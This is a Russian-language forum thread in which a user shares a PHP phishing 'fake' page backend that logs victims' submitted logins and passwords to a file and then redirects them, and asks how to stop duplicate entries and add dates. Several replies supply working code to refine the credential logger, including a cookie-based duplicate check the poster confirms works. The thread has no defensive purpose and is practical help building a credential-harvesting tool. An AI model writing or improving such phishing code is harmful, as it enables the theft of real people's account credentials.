Если запись существует - не дописывать...

Тема в разделе "Как сделать...", создана пользователем extrimportal, 29 май 2010.

Статус темы:
Закрыта.
  1. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    Здравствуйте. Кароче у меня есть фейк, которые записывает логины и пароли в файл... вот его код
    PHP:
    <?PHP
    $Login 
    $_POST['login']; // Логин
    $Pass $_POST['passwd']; // Пароль

    $log fopen("bas.php","a+"); //открываем файл базы
    fwrite($log,"\n $Login:$Pass \n"); //записываем всё
    fclose($log); //закрываем
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://.....'></head></html>"// куда пошлем пользователя после того как он ввел данные!
    ?>
    Можно сделать чтобы все пари (логин:пароль) были с новой строки и перед добавлением проводилась проверка, то есть если запись существует, то не записывать, а то добавляют одну запись по 7-8 раз. И еще но это уже так... было бы очень хорошо если бы ставилась дата каждый день а после писались данные, пример:
    7.07.90
    лшырвал:ыдалордыа
    щшардыва:щшоуа
    4.07.93
    ываыва:щыоа
    Буду очень благодарен за помощь. Спасибо. :thenks::thenks::thenks:
     
  2. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    А если будет смена пароля?

    PHP:
    fwrite($log,"$Login:$Pass \r\n"); //записываем всё
    с новой строки новая пара!
     
  3. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    а может тогда проводить проверку по паролю если нельзя по целой паре?
     
  4. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    а поиск делать с помощью substr если не ошибаюсь... :D
     
  5. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    :D логинчо. а если перехватывать данные и сравнивать с каждой парой или с символами после двоеточия?
     
  6. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    Сравнивай целую пару (логин:пасс), если сходства нет, дозапись, ежели совпало шли лесом =)
     
  7. BKK

    BKK

    Регистр.:
    21 окт 2009
    Сообщения:
    163
    Симпатии:
    45
    PHP:
    <?PHP 
    $Login 
    $_POST['login']; // Логин 
    $Pass $_POST['passwd']; // Пароль 

    if(!isset($_COOKIE['controler']))
    {
    $log fopen("bas.php","a+"); //открываем файл базы 
    fwrite($log,"$Login:$Pass \r\n");
    fclose($log);
    //устанавливаем куки на 200 секунд
    setcookie("controler",md5(time()),time()+200);
    }

     
    //закрываем 
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://.....'></head></html>"// куда пошлем пользователя после того как он ввел данные! 
    ?>
     
    extrimportal нравится это.
  8. Mr.Emm

    Mr.Emm Постоялец

    Регистр.:
    5 май 2008
    Сообщения:
    144
    Симпатии:
    107
    PHP:
    $mydata file('base.dat');
    if(!empty(
    $login) && !empty($pass) && !in_array($login.":".$pass$mydata)) {
     
    myfunction(array('login'=>$login'pass'=>$pass)); 
    } else { 
     echo 
    "gjikb ktcjv";
    }
    function 
    myfunction($vars) {
    //$vars['login']
    //$vars['pass'] 
    //
    // все действия по записи в бд
    }
     
  9. extrimportal

    extrimportal

    Регистр.:
    28 ноя 2008
    Сообщения:
    540
    Симпатии:
    70
    варіант Mr.Emm даже не понял куда писать, но спасибо за усердия. Варіант BKK работает, а можно еще что то с датой придумать, а пока что БОЛЬШОЙ ФЕНКС!!! п.с. а что делают кукисы, или то время которые они установлены?
     
  10. Mr.Emm

    Mr.Emm Постоялец

    Регистр.:
    5 май 2008
    Сообщения:
    144
    Симпатии:
    107
    О_о ты кто, программист или фейктишист?))
     
Статус темы:
Закрыта.